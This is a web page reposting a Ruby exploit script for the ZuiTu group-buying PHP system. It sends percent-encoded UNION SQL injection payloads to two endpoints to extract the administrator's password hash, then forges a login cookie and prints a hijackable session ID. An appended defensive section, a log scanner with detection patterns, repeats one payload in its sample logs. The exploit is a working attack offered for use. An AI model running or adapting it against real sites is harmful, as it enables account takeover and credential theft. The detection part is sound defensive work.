Source: zixuephp.com (自学PHP网)  Date: 2015-04-17 11:59
This time the hash is retrieved without blind injection.
```ruby
require "net/http"
require "uri"
require 'digest/md5'

doc =<<HERE
-------------------------------------------------------
ZuiTu TuanGou System Inejction Exploit
Author:ztz
www.2cto.com
Blog:http://ztz.fuzzexp.org/
-------------------------------------------------------
HERE

usage =<<HERE
Usage:
  ruby #{$0} host port path
example:
  ruby #{$0} demo.zuitu.com 80 /
HERE

def send(url, cookie='')
  uri = URI(url)
  http = Net::HTTP.new(uri.host, uri.port)
  request = Net::HTTP::Get.new(uri.request_uri)
  if cookie.length != 0
    request.initialize_http_header({"Cookie" => "#{$cookie}"})
  end
  response = http.request(request)
  return response.body
end

def encode64(bin)
  [bin].pack("m")
end

def getpassword
  exp1 = "http://#{$host}:#{$port}/#{$path}ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23"
  exp2 = "http://#{$host}:#{$port}/#{$path}api/call.php?action=query&num=1')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2C3%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1%3B%23"
  $password = send(exp1).scan(/\w{32}/)
  if $password.length == 0
    $password = send(exp2).scan(/\w{32}/)
  end
end

def getsession
  cname = Digest::MD5.hexdigest($host)[0, 4] + "_ru"
  cvalue = "1@" + $password.join()
  $cookie = cname + "=" + encode64(cvalue)
  puts "[*]cookie: #{$cookie}"
  uri = URI("http://#{$host}:#{$port}/#{$path}index.php")
  http = Net::HTTP.new(uri.host, uri.port)
  request = Net::HTTP::Get.new(uri.request_uri)
  request.initialize_http_header({"Cookie" => "#{$cookie}"})
  response = http.request(request)
  $session = response["Set-Cookie"].scan(/PHPSESSID=\w+;/).join()
end

puts doc
if ARGV.length < 3
  puts usage
else
  $host = ARGV[0]
  $port = ARGV[1]
  $path = ARGV[2]
  puts "[*]get administrator's hash..."
  getpassword()
  if $password.length == 0
    puts "[-]Can't get administrator's hash..."
    exit
  end
  puts "[+]hash: #{$password.join()}"
  puts "[*]Inject into cookie..."
  getsession()
  if $session.length == 0
    puts "[-]can't get cookie!"
  end
  puts "[+]set this cookie: #{$session}"
end
```
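From the defender's side, the requests above are easy to spot in web server logs once the `/**/` comment padding and percent-encoding are normalised away. The following Ruby access-log scanner is an added example, not part of the original post; the log lines it runs on are constructed (two of them reuse the two injection points shown above), and the rule set is illustrative.

```ruby
require 'cgi'

# Constructed sample access-log lines (not from the page). Requests 2 and 3
# reuse the two injection points the exploit above targets; 1 and 4 are benign.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [17/Apr/2015:11:59:01 +0800] "GET /ajax/chargecard.php?action=query&secret=abc123 HTTP/1.1" 200 512
  10.0.0.9 - - [17/Apr/2015:11:59:02 +0800] "GET /ajax/chargecard.php?action=query&secret=')%2F**%2Fand%2F**%2F1%3D2%2F**%2Funion%2F**%2Fselect%2F**%2F1%2C2%2Cconcat(username%2CCHAR(0x3d)%2Cpassword)%2C4%2C5%2C9999647600%2F**%2Ffrom%2F**%2Fuser%2F**%2Fwhere%2F**%2Fid%3D1;%23 HTTP/1.1" 200 640
  10.0.0.9 - - [17/Apr/2015:11:59:03 +0800] "GET /api/call.php?action=query&num=1')/**/UNION/**/SELECT/**/1,2,3 HTTP/1.1" 200 640
  10.0.0.7 - - [17/Apr/2015:11:59:04 +0800] "GET /index.php HTTP/1.1" 200 2048
LOG

# Signatures matched against the *normalised* URI, so that comment padding and
# percent-encoding cannot hide them.
INJECTION_PATTERNS = [
  /union\s+(all\s+)?select/,                     # UNION-based column extraction
  /concat\s*\(/,                                 # concatenating columns into one field
  /\bfrom\s+\w+\s+where\b/,                      # a complete trailing SELECT clause
  /(^|[^\w])'\)?\s*(and|or)\s+1\s*=\s*[12]/      # quote/paren breakout plus 1=1 / 1=2
].freeze

# Percent-decode (twice, to also catch double encoding), turn /**/ comments
# into spaces, collapse whitespace and lowercase before matching.
def normalize_uri(raw_uri)
  decoded = raw_uri
  2.times { decoded = CGI.unescape(decoded) }
  decoded.gsub(%r{/\*.*?\*/}m, ' ').gsub(/\s+/, ' ').downcase
end

# Returns one hash per suspicious request: client IP, raw URI, matched rules.
def scan_access_log(log_text)
  log_text.each_line.with_object([]) do |line, hits|
    m = line.match(/"(?:GET|POST) (\S+) HTTP/)
    next unless m
    norm = normalize_uri(m[1])
    matched = INJECTION_PATTERNS.select { |re| norm.match?(re) }
    next if matched.empty?
    hits << { ip: line.split.first, uri: m[1], rules: matched.map(&:source) }
  end
end

if __FILE__ == $0
  scan_access_log(SAMPLE_LOG).each do |h|
    puts "[!] #{h[:ip]} matched #{h[:rules].size} rule(s): #{h[:uri][0, 70]}"
  end
end
```

Normalising before matching is the point: a filter that looks for the literal string `union select` in the raw URI misses both malicious requests in the sample.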